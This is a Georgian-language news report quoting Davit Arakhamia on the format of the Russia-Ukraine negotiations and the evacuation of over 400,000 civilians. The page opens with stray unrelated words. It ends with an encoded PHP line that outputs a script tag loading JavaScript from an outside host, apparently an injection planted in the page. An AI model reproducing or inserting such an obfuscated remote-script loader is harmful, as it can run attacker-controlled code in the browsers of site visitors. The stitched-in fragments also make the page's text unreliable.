celsiusi
ავერსი შნაიდერი
რუსეთ-უკრაინის მოლაპარაკებებში უკრაინის დელეგაციის ხელმძღვანელის და უკრაინული ფრაქცია „ხალხის მსახურის“ თავმჯდომარის დავით არახამიას განცხადებით, მოლაპარაკებები ვიდეოკონფერენციის სახით მიმდინარეობს ე.წ მცირე და მსხვილი მოლაპარაკებების ფორმატში. ამის სესახებ არახამიამ "მთავარის" ეთერში ისაუბრა. 
 
"მოლაპარაკებები გრძელდება. პაუზა გვქონდა უკანასკნელი 2 დღის განმავლობაში, რადგან ველით  სიტყვას როდის შეასრულებენ და მოგცემენ შესაძლებლობას მოქალაქეები მარიუპოლიდან გავიყვანოთ. იმ ტერიტორიიდან, რომელსაც ახლა რუსეთი აკონტროლებს. ეს მოლაპარაკებები ვიდეოკონფერენციის სახით მიმდინარეობს ე.წ მცირე და მსხვილი მოლაპარაკებების ფორმატში. მსხვილ ფორმატში ყველა მონაწილეობს, ხოლო მცირე ფორმატის ფარგლებში ქვეჯგუფებად ვართ დაყოფილები სხვადასხვა თემის მიხედვით, მაგალითად სამხედრო, ჰუმანიტარული და სხვა მიმართულებით.
 
მოლაპარაკებებში დიდ წარმატებას ვერ დავიკვეხნით, მაგრამ მოლაპარაკებების დამსახურებით 400 000-ზე მეტი სამოქალაქო პირის გაყვანა შევძელით სხვადასხვა რთული ტერიტორიიდან. ჰუმანიტარული თვალსაზრისით მოლაპარაკება მუშაობს. რაც შეეხება შეთანხმებას რუსეთ ყოველთვის ცდილობს ულტიმატუმი წაგვიყენოს“, - განაცხადა "მთავარის" ეთერში რუსეთ-უკრაინის მოლაპარაკებებში უკრაინის დელეგაციის ხელმძღვანელმა და უკრაინული ფრაქცია „ხალხის მსახურის“ თავმჯდომარემ დავით არახამიამ.
 
წყარო : მთავარი არხი 
793
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");